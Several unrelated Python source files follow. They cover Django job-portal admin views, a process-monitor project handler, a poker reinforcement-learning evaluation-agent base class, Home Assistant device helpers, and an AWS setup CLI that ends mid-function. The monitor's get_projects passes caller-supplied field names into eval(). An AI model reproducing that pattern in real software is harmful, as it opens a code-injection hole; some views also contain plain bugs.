return render(request, 'jobport/notallowed.html')
@login_required()
def batchdestroy(request, batchid):
"""Delete a Batch."""
if is_admin(request.user):
Batch.objects.get(pk=batchid).delete()
return HttpResponseRedirect('/')
@login_required()
def batchedit(request, batchid):
"""Edit details of a Batch."""
if is_admin(request.user):
if request.method == 'POST':
form = forms.BatchForm(
request.POST, instance=Batch.objects.get(pk=batchid))
if form.is_valid():
form.save()
messages.success(request, 'Batch was updated!')
return HttpResponseRedirect('/batch/' + str(batchid) + '/')
else:
context = {'form': form}
return render(request, 'jobport/admin_editbatch.html', context)
else:
form = forms.BatchForm(instance=Batch.objects.get(pk=batchid))
c = {'form': form}
return render(request, 'jobport/admin_editbatch.html', c)
@login_required()
def viewbatches(request):
"""View the list of all Batches."""
if is_admin(request.user):
batches = Batch.objects.all()
return render(request, 'jobport/batches.html', {'batch': batches})
else:
return render(request, 'jobport/badboy.html')
@login_required()
def batchpage(request, batchid):
"""Batch Page."""
if is_admin(request.user):
context = {'user': request.user, 'student': Batch.objects.get(pk=batchid).studentsinbatch.all(),
'batch': Batch.objects.get(pk=batchid)}
return render(request, 'jobport/admin_batch.html', context)
return render(request, 'jobport/welcome.html')
@login_required()
def getbatchresumes(request, batchid):
"""Get resumes for a Batch."""
if is_admin(request.user):
filenames = []
checklist = Batch.objects.get(pk=batchid).studentsinbatch.all()
zip_subdir = Batch.objects.get(pk=batchid).title + "_resumes"
for student in checklist:
filenames.append(student.resume.path)
zip_filename = "%s.zip" % zip_subdir
s = StringIO.StringIO()
zf = zipfile.ZipFile(s, "w")
for fpath in filenames:
fdir, fname = os.path.split(fpath)
zip_path = os.path.join(zip_subdir, fname)
zf.write(fpath, zip_path)
zf.close()
resp = HttpResponse(
s.getvalue(), mimetype="application/x-zip-compressed")
resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename
return resp
else:
return render(request, 'jobport/badboy.html')
@login_required()
def uploadstudentsinbatch(request, batchid):
"""Add students in a batch, by uploading a CSV. Will not be required IMHO."""
if is_admin(request.user):
if request.method == 'POST':
file = request.FILES['students']
notfound = []
for row in csv.reader(file.read().splitlines()):
try:
stud = Student.objects.get(pk=row[0])
batch = Batch.get.objects(pk=batchid)
stud.batch = batch
stud.save()
except ObjectDoesNotExist:
notfound.append(row[0])
context = {'notfound': notfound}
messages.success(
request, 'Students succesfully added to the Batch!')
return render(request, 'jobport/admin_addstudentstobatch.html', context)
else:
return render(request, 'jobport/admin_addstudentstobatch.html')
else:
return render(request, 'jobport/notallowed.html') # 403 Error
@login_required()
def search(request):
"""Search, something. anything."""
if is_admin(request.user):
form = forms.RootSearchForm(request.GET)
query = request.GET.get('q')
if query == '':
messages.error(request, 'Please enter a Query!')
return render(request, 'jobport/notallowed.html')
else:
return render(request, 'jobport/result.html',
{'search_query': query, 'results': form.search()})
else:
return render(request, 'jobport/notallowed.html') # 403 Error
|
<reponame>augustand/Jmonitor
# -*- coding:utf-8 -*-
import json
from pony.orm import db_session, delete, select
from pony.orm.serialization import to_dict
from project.db.model import Template, Project
class ProjectHandle(object):
def add_projects(self, projects):
with db_session:
projects = json.loads(projects)
for project in projects:
program = project.get("program")
process_name = project.get("process_name")
command = project.get("command")
numprocess = int(project.get("numprocess"))
port = int(project.get("port"))
if Template.exists(program=program):
return json.dumps(dict(
msg="program:{0}已经存在".format(program),
status="fail"
))
Template(**project)
for i in range(numprocess):
Project(
program=program,
process_name=process_name.format(port=i),
command=command.format(port=i + port),
port=i + port
)
return json.dumps(dict(
status="ok",
msg=""
))
def remove_projects(self, programs):
with db_session:
try:
programs = json.loads(programs)
delete(p for p in Template if p.program in programs)
delete(p for p in Project if p.program in programs)
return json.dumps(dict(
status="ok",
msg=""
))
except Exception, e:
return json.dumps(dict(
status="fail",
msg=e.message
))
def get_projects(self, data):
from misc import gen_fields
print data
data = json.loads(data)
programs = data.get("programs", [])
fields = data.get("fields", [])
with db_session:
if programs or fields:
res = eval("select({0} for p in Project {1})".format(
gen_fields('p', fields),
"" if not programs else "if p.program in programs"
))
else:
res = select(p for p in Project)
_data = res[:] if programs or fields else res.first()
if __debug__:
print res.get_sql()
print to_dict(_data)
try:
return json.dumps(dict(
status="ok",
data=to_dict(_data)
))
except Exception, e:
return json.dumps(dict(
status="fail",
msg=e.message
))
def update_project(self, data):
with db_session:
try:
data = json.loads(data)
program = data.get("program")
del data["program"]
Template[program].set(**data)
delete(p for p in Project if p.program == program)
process_name = data.get("process_name")
command = data.get("command")
numprocess = int(data.get("numprocess"))
port = int(data.get("port"))
for i in range(numprocess):
Project(
program=program,
process_name=process_name.format(port=i),
command=command.format(port=i + port),
port=i + port
)
return json.dumps(dict(
status="ok",
msg=""
))
except Exception, e:
return json.dumps(dict(
status="fail",
msg=e.message
))
def do_actions(self, data):
data = json.loads(data)
programs = data.get("programs", [])
actions = data.get("actions", [])
if __debug__:
print data
print programs, actions
from project_action import start, stop, restart
for action in actions:
print action
if action == u"start":
start(programs)
elif action == u"stop":
stop(programs)
elif action == u"restart":
restart(programs)
else:
return json.dumps(dict(
status=u'fail',
msg=u'命令不正确'
))
return json.dumps(dict(
status='ok',
msg=action
))
def ping(self):
return "ok"
if __name__ == '__main__':
pass
'''
db.insert("Person", name="Ben", age=33, returning='id')
x = "John"
data = db.select("* from Person where name = $x")
data = db.select("* from Person where name = $x", {"x" : "Susan"})
data = db.select("* from Person where name = $(x.lower()) and age > $(y + 2)")
select(c for c in Customer).order_by(Customer.name).limit(10)
g = Group[101]
g.students.filter(lambda student: student.gpa > 3)[:]
g.students.order_by(Student.name).page(2, pagesize=3)
g.students.order_by(lambda s: s.name).limit(3, offset=3)
Query.random()
select(p for p in Product if p.price > 100).for_update()
@db_session(retry=3)
def your_function():
...
update(p.set(price=price * 1.1) for p in Product if p.category.name == "T-Shirt")
delete(p for p in Product if p.category.name == "Floppy disk")
'''
|
<reponame>Jona-Gold/PokerRL
# Copyright (c) 2019 <NAME>
from PokerRL.rl import rl_util
from PokerRL.rl.MaybeRay import MaybeRay
from PokerRL.util.file_util import do_pickle, load_pickle
class EvalAgentBase:
"""
This baseclass should be subclassed by each agent/algorithm type. It is used to wrap the agent with his own
internal1 environment. It provides a standardized API for querying the agent for different things to the evaluators.
If an algorithm employs different agents for each seat on the table, this class should wrap all of them in one.
"""
ALL_MODES = NotImplementedError # Override with list of all modes
def __init__(self, t_prof, mode=None, device=None):
"""
Args:
t_prof (TrainingProfile):
mode: Any mode your algorithm's eval agent can be evaluated in. Specify modes
as class variables and pass one of them here. Can be changed later by calling
.to_mode(new_mode) on this instance
device (torch.device): The device the eval agent shall live and act on.
"""
self.t_prof = t_prof
self.ray = MaybeRay(runs_distributed=t_prof.DISTRIBUTED, runs_cluster=t_prof.CLUSTER)
self.env_bldr = rl_util.get_env_builder(t_prof=t_prof)
self._internal_env_wrapper = self.env_bldr.get_new_wrapper(is_evaluating=True, stack_size=None)
self._mode = mode
if device is None:
self.device = self.t_prof.device_inference
else:
self.device = device
# __________________________________________________ Query agents __________________________________________________
def get_a_probs_for_each_hand(self):
"""
Returns:
np.ndarray(RANGE_SIZE, N_ACTIONS): the action probabilities for each hand
"""
raise NotImplementedError
def get_a_probs(self):
"""
Returns:
np.ndarray(N_ACTIONS): action probs for hand currently held in current state
"""
raise NotImplementedError
def get_action(self, step_env=True, need_probs=False):
"""
Args:
step_env (bool): Whether the internal env shall be stepped
need_probs (bool): Whether the action probabilities for all hands shall be returned too
Returns:
action,
action probs for each hand (or None if not need_probs)
"""
raise NotImplementedError
def state_dict(self):
""" Override and keep base as one field! """
return {
"t_prof": self.t_prof,
"mode": self._mode,
"env": self._internal_env_wrapper.state_dict(),
"agent": self._state_dict(),
}
def load_state_dict(self, state):
self._internal_env_wrapper.load_state_dict(state["env"])
self._mode = state["mode"]
self._load_state_dict(state["agent"])
def _state_dict(self):
# Implement your agent's state_dict
raise NotImplementedError
def _load_state_dict(self, state):
# Implement your agent's load_state_dict
raise NotImplementedError
def update_weights(self, weights_for_eval_agent):
"""
Args:
weights_for_eval_agent: Can be any algorithm-specific data; e.g. Neural Network parameters for the agent
"""
raise NotImplementedError
def can_compute_mode(self):
"""
Returns:
bool: Whether whatever condition is satisfied (e.g. for delayed CFR+ whether enough
iterations have passed) to evaluate the algorithm with self._mode
"""
raise NotImplementedError
# _____________________________________________________ State ______________________________________________________
def set_stack_size(self, stack_size):
self._internal_env_wrapper.env.set_stack_size(stack_size=stack_size)
def get_mode(self):
return self._mode
def set_mode(self, mode):
assert mode in self.ALL_MODES
self._mode = mode
def set_env_wrapper(self, env_wrapper):
self._internal_env_wrapper = env_wrapper
def get_env_wrapper(self):
return self._internal_env_wrapper
def set_to_public_tree_node_state(self, node):
self._internal_env_wrapper.set_to_public_tree_node_state(node=node)
# __________________________________________________ Notifications _________________________________________________
def notify_of_action(self, p_id_acted, action_he_did):
assert self._internal_env_wrapper.env.current_player.seat_id == p_id_acted
self._internal_env_wrapper.step(action=action_he_did)
def notify_of_processed_tuple_action(self, p_id_acted, action_he_did):
assert self._internal_env_wrapper.env.current_player.seat_id == p_id_acted
self._internal_env_wrapper.step_from_processed_tuple(action=action_he_did)
def notify_of_raise_frac_action(self, p_id_acted, frac):
""" this fn is only useful to call if current_player wants to raise. Therefore it assumes that's the case. """
assert self._internal_env_wrapper.env.current_player.seat_id == p_id_acted
self._internal_env_wrapper.step_raise_pot_frac(pot_frac=frac)
def notify_of_reset(self):
self._internal_env_wrapper.reset()
self._internal_env_wrapper._list_of_obs_this_episode = [] # from .reset() the first obs is in by default
def reset(self, deck_state_dict=None):
self._internal_env_wrapper.reset(deck_state_dict=deck_state_dict)
# ___________________________________________________ Store State __________________________________________________
def env_state_dict(self):
return self._internal_env_wrapper.state_dict()
def load_env_state_dict(self, state_dict):
self._internal_env_wrapper.load_state_dict(state_dict)
def store_to_disk(self, path, file_name):
do_pickle(obj=self.state_dict(), path=path, file_name=file_name)
@classmethod
def load_from_disk(cls, path_to_eval_agent):
state = load_pickle(path=path_to_eval_agent)
eval_agent = cls(t_prof=state["t_prof"])
eval_agent.load_state_dict(state=state)
return eval_agent
|
"""dscriptmodule helper functions"""
from __future__ import annotations
from typing import Final
import logging
import asyncio
from homeassistant.core import HomeAssistant
from homeassistant.config_entries import ConfigEntry
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
CONF_BOARDS,
DATA_BOARDS,
DATA_ENTITIES,
DSDOMAIN_LIGHT,
DSDOMAIN_COVER,
DSDOMAIN_SWITCH,
DSDOMAIN_MOTION,
DSDOMAIN_BUTTON,
DSDOMAIN_BOARD,
DOMAIN,
)
_LOGGER: Final = logging.getLogger(__name__)
async def async_TopicToDomain(topic) -> str | None:
"""Async: map dscript event topic to ha platform"""
if topic == 'getlight':
return DSDOMAIN_LIGHT
elif topic == 'getsocket':
return DSDOMAIN_SWITCH
elif topic == 'getshutter':
return DSDOMAIN_COVER
elif topic == 'getmotion':
return DSDOMAIN_MOTION
elif topic == 'getbutton':
return DSDOMAIN_BUTTON
else:
return None
async def async_ProgrammingDebug(obj, show_all=False) -> None:
"""Async: return all attributes of a specific objec"""
try:
_LOGGER.debug("%s - async_ProgrammingDebug: %s", DOMAIN, obj)
for attr in dir(obj):
if attr.startswith('_') and not show_all:
continue
if hasattr(obj, attr ):
_LOGGER.debug("%s - async_ProgrammingDebug: %s = %s", DOMAIN, attr, getattr(obj, attr))
await asyncio.sleep(0)
except Exception as e:
_LOGGER.error("%s - async_ProgrammingDebug: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
pass
def ProgrammingDebug(obj, show_all=False) -> None:
"""return all attributes of a specific objec"""
try:
_LOGGER.debug("%s - ProgrammingDebug: %s", DOMAIN, obj)
for attr in dir(obj):
if attr.startswith('_') and not show_all:
continue
if hasattr(obj, attr ):
_LOGGER.debug("%s - ProgrammingDebug: %s = %s", DOMAIN, attr, getattr(obj, attr))
except Exception as e:
_LOGGER.error("%s - ProgrammingDebug: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
pass
async def async_getdSBoardByIP(hass: HomeAssistant, ip: str):
"""Get a board from the board list by its IP"""
_LOGGER.debug("%s - async_getdSBoardByIP: %s", DOMAIN, ip)
for dSBoard in hass.data[DOMAIN][DATA_BOARDS]:
try:
if dSBoard.IP == IP:
return dSBoard
await asyncio.sleep(0)
except NameError as e:
_LOGGER.debug("%s - async_getdSBoardByIP: known exception: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
continue
except Exception as e:
_LOGGER.error("%s - async_getdSBoardByIP: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
continue
_LOGGER.debug("%s - async_getdSBoardByIP: cannot find board: %s", DOMAIN, ip)
return None
async def async_getdSBoardByMAC(hass: HomeAssistant, mac: str):
"""Get a board from the board list by its MAC"""
_LOGGER.debug("%s - async_getdSBoardByMAC: %s", DOMAIN, mac)
mac = mac.lower()
for dSBoard in hass.data[DOMAIN][DATA_BOARDS]:
try:
if dSBoard._MACAddress.lower() == mac:
return dSBoard
await asyncio.sleep(0)
except NameError as e:
_LOGGER.debug("%s - async_getdSBoardByMAC: known exception: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
continue
except Exception as e:
_LOGGER.error("%s - async_getdSBoardByMAC: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
continue
_LOGGER.debug("%s - async_getdSBoardByMAC: cannot find board: %s", DOMAIN, mac)
return None
async def async_getdSEntityByID(hass: HomeAssistant, dSBoardIP: str, identifier: int, domain: str):
"""Async: Gets a dScript Entity from list by poviding its dSBoard, topic and dSBoard internal identifier"""
_LOGGER.debug("%s - async_getdSEntityByID: %s | %s | %s", DOMAIN, dSBoardIP, str(identifier), domain)
for dSDevice in hass.data[DOMAIN][DATA_ENTITIES]:
try:
if dSDevice._board.IP == dSBoardIP and dSDevice._identifier == identifier and dSDevice._domain == domain:
return dSDevice
await asyncio.sleep(0)
except NameError as e:
_LOGGER.debug("%s - async_getdSEntityByID: known exception: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
continue
except Exception as e:
_LOGGER.error("%s - async_getdSEntityByID: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
continue
_LOGGER.debug("%s - async_getdSEntityByID: cannot find device: %s | %s | %s", DOMAIN, dSBoardIP, str(identifier), domain)
return None
async def async_getdSEntityByEntityID(hass: HomeAssistant, entity_id: str):
"""Async: Gets a dScript Entity from list by poviding its entity_id"""
try:
_LOGGER.debug("%s - async_getdSEntityByEntityID: %s", DOMAIN, entity_id)
entity=None
for device in hass.data[DOMAIN][DATA_ENTITIES]:
if device.entity_id == entity_id:
entity=device
break
await asyncio.sleep(0)
if entity is None:
_LOGGER.debug("%s - async_getdSEntityByEntityID: cannot find entity: %s", DOMAIN, entity_id)
return None
_LOGGER.debug("%s - async_getdSEntityByEntityID: found entity: %s", DOMAIN, entity._name)
return entity
except Exception as e:
_LOGGER.error("%s - async_getdSEntityByEntityID: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
return False
async def async_setupPlatformdScript(platform, hass: HomeAssistant, config: ConfigEntry, async_add_entities: AddEntitiesCallback, discovery_info=None) -> None:
"""Wrapper to set up different dScriptModule platforms."""
entites=[]
try:
_LOGGER.debug("%s - async_setupPlatformdScript: %s", DOMAIN, platform)
if discovery_info is None:
boards=hass.data[DOMAIN][DATA_BOARDS]
_LOGGER.debug("%s - async_setupPlatformdScript: using DATA_BOARDS %s", DOMAIN, boards)
else:
boards=[ discovery_info ]
_LOGGER.debug("%s - async_setupPlatformdScript: using discovery_info %s", DOMAIN, boards)
except Exception as e:
_LOGGER.error("%s - async_setupPlatformdScript: failed: %s (%s.%s)", DOMAIN, str(e), e.__class__.__module__, type(e).__name__)
return False
_LOGGER.debug("%s - async_setupPlatformdScript: %s boards to process", DOMAIN, len(boards))
for dSBoard in boards:
try:
_LOGGER.debug("%s - async_setupPlatformdScript: %s", dSBoard.friendlyname, platform)
if not dSBoard._CustomFirmeware and not platform =='switch' and not platform =='boardsensor':
_LOGGER.warning("%s - async_setupPlatformdScript: platform %s requires custom firmware - do nothing", dSBoard.friendlyname, platform)
continue
if platform == DSDOMAIN_LIGHT:
from .light import dScriptLight
boardEntities=dSBoard._ConnectedLights
elif platform == DSDOMAIN_COVER:
from .cover import dScriptCover
boardEntities=dSBoard._ConnectedShutters
elif platform == DSDOMAIN_SWITCH:
from .switch import dScriptSwitch
if dSBoard._CustomFirmeware: # If the board runs custom firmeware connect only switch devices as switch
boardEntities=dSBoard._ConnectedSockets
else: # If the board runs default firmware connect all physical relays as switch
boardEntities=dSBoard._PhysicalRelays
elif platform == DSDOMAIN_MOTION:
from .sensor import dScriptMotionSensor
boardEntities=dSBoard._ConnectedMotionSensors
elif platform == DSDOMAIN_BUTTON:
from .sensor import dScriptButtonSensor
boardEntities=dSBoard._ConnectedButtons
elif platform == DSDOMAIN_BOARD:
from .sensor import dScriptBoardSensor
boardEntities=1
else:
_LOGGER.error("%s - async_setupPlatformdScript: invalid platform %s", dSBoard.friendlyname, platform)
return None
_LOGGER.debug("%s - async_setupPlatformdScript: prepare %s %s entites", dSBoard.friendlyname, boardEntities, platform)
i=0
while i < boardEntities:
try:
i += 1
# entity = await async_getdSEntityByID(hass, dSBoard.IP, i, platform)
# if not entity is None:
# _LOGGER.debug("%s - async_setupPlatformdScript: entity alreay exists: %s", dSBoard.friendlyname, entity._name)
# continue # If the entity already exists do not recreate
_LOGGER.debug("%s - async_setupPlatformdScript: create new entity: %s%s", dSBoard.friendlyname, platform, str(i))
if platform == DSDOMAIN_LIGHT:
entity = dScriptLight(dSBoard, i, platform)
elif platform == DSDOMAIN_COVER:
entity = dScriptCover(dSBoard, i, platform)
elif platform == DSDOMAIN_SWITCH:
entity = dScriptSwitch(dSBoard, i, platform)
elif platform == DSDOMAIN_MOTION:
entity = dScriptMotionSensor(dSBoard, i, platform)
elif platform == DSDOMAIN_BUTTON:
entity = dScriptButtonSensor(dSBoard, i, platform)
elif platform == DSDOMAIN_BOARD:
entity = dScriptBoardSensor(dSBoard, i, platform)
else:
continue
entity_exist = await async_getdSEntityByEntityID(hass, entity._name)
if not entity_exist is None:
_LOGGER.warning("%s - async_setupPlatformdScript: a entity with the equal name / entity_id alreay exists: %s", dSBoard.friendlyname, entity._name)
continue
else:
hass.data[DOMAIN][DATA_ENTITIES].append(entity)
entites.append(entity)
except Exception as e:
_LOGGER.error("%s - async_setupPlatformdScript: failed to create %s%s: %s (%s.%s)", dSBoard.friendlyname, platform, i, str(e), e.__class__.__module__, type(e).__name__)
await asyncio.sleep(0)
except Exception as e:
_LOGGER.error("%s - async_setupPlatformdScript: setup %s failed: %s (%s.%s)", dSBoard.friendlyname, platform, str(e), e.__class__.__module__, type(e).__name__)
return False
_LOGGER.info("%s - async_setupPlatformdScript: setup %s %s entitys", DOMAIN, len(entites), platform)
if not entites:
return None
#async_add_entities(entites, update_before_add=True) #-> causes not NoEntitySpecifiedError
async_add_entities(entites)
|
<reponame>wpilibsuite/INNDiE-cli
import json
import tempfile
import click
import boto3
import os.path
all_perm = {
"FromPort": -1,
"IpProtocol": "-1",
"IpRanges": [{"CidrIp": "0.0.0.0/0"}],
"Ipv6Ranges": [{"CidrIpv6": "::/0"}],
"ToPort": -1
}
all_http_perm = {
"FromPort": 80,
"IpProtocol": "tcp",
"IpRanges": [{"CidrIp": "0.0.0.0/0"}],
"Ipv6Ranges": [{"CidrIpv6": "::/0"}],
"ToPort": 80
}
def make_client(name, region):
if region is None:
return boto3.client(name)
else:
return boto3.client(name, region_name=region)
def make_resource(name):
return boto3.resource(name)
def revoke_all_perms(sg):
"""
Revokes all permissions from the SecurityGroup.
:param sg: The SecurityGroup.
"""
if len(sg.ip_permissions) > 0:
sg.revoke_ingress(IpPermissions=sg.ip_permissions)
if len(sg.ip_permissions_egress) > 0:
sg.revoke_egress(IpPermissions=sg.ip_permissions_egress)
def ensure_ec2_gress(sg_id, region):
"""
Rewrites the ingress and egress permissions for the SecurityGroup. All existing ingress and
egress permissions are revoked. The permissions that INNDiE needs are authorized.
:param sg_id: The SecurityGroup's GroupId.
:param region: The region, or `None` to pull the region from the environment.
:return: Nothing.
"""
ec2 = boto3.resource('ec2', region_name=region)
sg = ec2.SecurityGroup(sg_id)
revoke_all_perms(sg)
sg.authorize_egress(IpPermissions=[all_perm])
sg.authorize_ingress(IpPermissions=[all_http_perm])
def get_single_security_group(client, sg_name, desc):
"""
Ensures that exactly one matching SecurityGroup exists. If there is one match, its permissions
are remade. If there is more than one match, a RuntimeError is raised. If there are no matches,
a new SecurityGroup is made.
:param client: The EC2 client to use.
:param sg_name: The name of the SecurityGroup.
:param desc: The description of the SecurityGroup, if it needs to be created.
:return: The GroupId of the matching SecurityGroup.
"""
security_groups = client.describe_security_groups(
Filters=[
{
"Name": "group-name",
"Values": [sg_name]
}
]
)["SecurityGroups"]
sgs = [it for it in security_groups if it["GroupName"] == sg_name]
if len(sgs) > 1:
raise RuntimeError("Matched multiple security groups: {}".format(sgs))
if len(sgs) == 1:
# The SG already exists
sg = sgs[0]
sg_id = sg["GroupId"]
else:
sg_id = client.create_security_group(
Description=desc,
GroupName=sg_name
)["GroupId"]
return sg_id
def ensure_ec2_security_group(region):
"""
Ensures that the EC2 SecurityGroup exists.
:param region: The region, or `None` to pull the region from the environment.
:return: The GroupId of the SecurityGroup.
"""
sg_name = "inndie-autogenerated-ec2-sg"
client = make_client("ec2", region)
sg_id = get_single_security_group(client, sg_name, "INNDiE autogenerated for EC2.")
ensure_ec2_gress(sg_id, region)
return sg_id
def select_subnet(region):
"""
Picks the first available subnet.
:param region: The region, or `None` to pull the region from the environment.
:return: The SubnetId.
"""
client = make_client("ec2", region)
return client.describe_subnets(Filters=[])["Subnets"][0]["SubnetId"]
def ensure_role(client, role_name):
"""
Ensures that a SINGLE matching IAM role exists. Throws a `RuntimeError` if there are multiple
matching roles.
:param client: The iam client to use.
:param role_name: The name of the IAM role.
:return: The ARN of the matching IAM role, or `None` if there was no matching role.
"""
roles = client.list_roles(PathPrefix="/")["Roles"]
matching_roles = [it for it in roles if it["RoleName"] == role_name]
if len(matching_roles) == 1:
return matching_roles[0]["Arn"]
elif len(matching_roles) > 1:
raise RuntimeError("Found multiple matching roles: {}".format(role_name, roles))
else:
return None
def ensure_ec2_role(region, role_name="inndie-autogenerated-ec2-role"):
"""
Ensures the EC2 role exists. Creates the role if it does not exist.
:param region: The region, or `None` to pull the region from the environment.
:param role_name: The name of the role to ensure.
:return: The role Arn.
"""
client = make_client("iam", region)
role_arn = ensure_role(client, role_name)
if role_arn is None:
# Need to create the role
role = client.create_role(
Path="/",
RoleName=role_name,
AssumeRolePolicyDocument=json.dumps({
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
})
)["Role"]
role_arn = role["Arn"]
client.attach_role_policy(RoleName=role_name,
PolicyArn="arn:aws:iam::aws:policy/AmazonS3FullAccess")
return role_arn
def ensure_ec2_instance_profile(region, profile_name="inndie-autogenerated-ec2-instance-profile",
role_name="inndie-autogenerated-ec2-role"):
"""
Ensures the EC2 instance profile exists and has the EC2 role attached.
:param region: The region, or `None` to pull the region from the environment.
:param profile_name: The name of the instance profile to ensure.
:param role_name: The name of the role to ensure.
:return: The instance profile Arn.
"""
client = make_client("iam", region)
iam_resource = make_resource('iam')
# Get or create the instance profile
try:
local_profile = client.get_instance_profile(InstanceProfileName=profile_name)
except:
local_profile = client.create_instance_profile(InstanceProfileName=profile_name)
instance_profile = iam_resource.InstanceProfile(
local_profile['InstanceProfile']['InstanceProfileName'])
if role_name not in [role.name for role in instance_profile.roles]:
# Add the role if it does not exist
instance_profile.add_role(RoleName=role_name)
return instance_profile.arn
def ensure_s3_bucket(region):
"""
Ensures that a matching S3 bucket exists.
:param region: The region, or `None` to pull the region from the environment.
:return: The name of the bucket.
"""
client = make_client("s3", region)
prefix = "inndie-autogenerated-" # Used to identify the bucket that INNDiE manages
def get_inndie_bucket():
buckets = client.list_buckets()["Buckets"]
# Return the first matching bucket name, if there is one
for bucket in buckets:
if bucket["Name"].startswith(prefix):
return bucket["Name"]
return None
inndie_bucket = get_inndie_bucket()
if inndie_bucket is not None:
return inndie_bucket
# There is no matching bucket name, so create a new one
import random
import string
while True:
bucket_name = prefix + ''.join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(30))
# If the user wants a region in this list, we need to set it
if region in ['EU', 'eu-west-1', 'us-west-1', 'us-west-2',
'ap-south-1', 'ap-southeast-1', 'ap-southeast-2',
'ap-northeast-1', 'sa-east-1', 'cn-north-1',
'eu-central-1']:
client.create_bucket(ACL='private', Bucket=bucket_name,
CreateBucketConfiguration={'LocationConstraint': region})
else:
# Otherwise the region will be us-east-1
client.create_bucket(ACL='private', Bucket=bucket_name)
# Busy loop until the bucket is created. Otherwise, we will set the public access block
# too early and its configuration will be lost
while True:
inndie_bucket = get_inndie_bucket()
if inndie_bucket is not None:
break
client.put_public_access_block(Bucket=bucket_name, PublicAccessBlockConfiguration={
'BlockPublicAcls': True,
'IgnorePublicAcls': True,
'BlockPublicPolicy': True,
'RestrictPublicBuckets': True
})
return bucket_name
def impl_ensure_configuration(region):
"""
Ensures all the configuration INNDiE needs is in place.
:param region: The region, or `None` to pull the region from the environment.
"""
ensure_s3_bucket(region)
ensure_ec2_security_group(region)
ensure_ec2_role(region)
ensure_ec2_instance_profile(region)
def impl_upload_model(model_path, bucket_name, region):
"""
Uploads a model to S3.
:param model_path: The file path to the model to upload, ending with the name of the model.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
key = "inndie-models/" + os.path.basename(model_path)
client.upload_file(model_path, bucket_name, key)
print("Uploaded to: {}\n".format(key))
def impl_download_model(model_path, bucket_name, region):
"""
Downloads a model from S3.
:param model_path: The file path to download to, ending with the name of the model.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
key = "inndie-models/" + os.path.basename(model_path)
client.download_file(bucket_name, key, model_path)
print("Downloaded from: {}\n".format(key))
def impl_download_training_script(script_path, bucket_name, region):
"""
Downloads a training script from S3.
:param script_path: The file path to download to, ending with the name of the script.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
key = "inndie-training-scripts/" + os.path.basename(script_path)
client.download_file(bucket_name, key, script_path)
print("Downloaded from: {}\n".format(key))
def impl_upload_dataset(dataset_path, bucket_name, region):
"""
Uploads a dataset to S3.
:param dataset_path: The file path to the dataset to upload, ending with the name of the
dataset.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
key = "inndie-datasets/" + os.path.basename(dataset_path)
client.upload_file(dataset_path, bucket_name, key)
print("Uploaded to: {}\n".format(key))
def impl_download_dataset(dataset_path, bucket_name, region):
"""
Downloads a dataset from S3.
:param dataset_path: The file path to download to, ending with the name of the dataset.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
key = "inndie-datasets/" + os.path.basename(dataset_path)
client.download_file(bucket_name, key, dataset_path)
print("Downloaded from: {}\n".format(key))
def impl_update_training_progress(job_id, progress_text, bucket_name, region):
"""
Updates the training progress in S3 for a model specified by its name.
:param job_id: The unique Job ID.
:param progress_text: The text to write into the progress file.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
local_file, path = tempfile.mkstemp()
try:
with open(local_file, "w") as f:
f.write(progress_text)
client = make_client("s3", region)
remote_path = create_progress_prefix(job_id) + "/progress.txt"
client.upload_file(path, bucket_name, remote_path)
print("Updated progress in: {}\n".format(remote_path))
finally:
os.remove(path)
def impl_create_heartbeat(job_id, bucket_name, region):
"""
Creates a heartbeat that INNDiE uses to check if the training script is running properly.
:param job_id: The unique Job ID.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
remote_path = create_progress_prefix(job_id) + "/heartbeat.txt"
client.put_object(Body="1", Bucket=bucket_name, Key=remote_path)
print("Created heartbeat file in: {}\n".format(remote_path))
def impl_remove_heartbeat(job_id, bucket_name, region):
"""
Removes a heartbeat that INNDiE uses to check if the training script is running properly.
:param job_id: The unique Job ID.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
remote_path = create_progress_prefix(job_id) + "/heartbeat.txt"
client.put_object(Body="0", Bucket=bucket_name, Key=remote_path)
print("Removed heartbeat file in: {}\n".format(remote_path))
def impl_set_training_log_file(job_id, log_file, bucket_name, region):
"""
Sets the training log file contents to the contents of the log file.
:param job_id: The unique Job ID.
:param log_file: The log file to read from.
:param bucket_name: The S3 bucket name.
:param region: The region, or `None` to pull the region from the environment.
"""
client = make_client("s3", region)
remote_path = create_progress_prefix(job_id) + "/log.txt"
with open(log_file, "r") as f:
client.put_object(Body=f.read(), Bucket=bucket_name, Key=remote_path)
print("Set training log file in: {}\n".format(remote_path))
def impl_upload_training_results(job_id, output_dir, bucket_name, region):
client = make_client("s3", region)
files_to_upload = [os.path.join(output_dir, it) for it in os.listdir(output_dir)]
files_to_upload = [it for it in files_to_upload if os.path.isfile(it)]
for elem in files_to_upload:
ext = os.path.splitext(elem)[1].lower()
# Upload model files to the model prefix instead of the test result prefix so that users
# can select them as models to start new Jobs with.
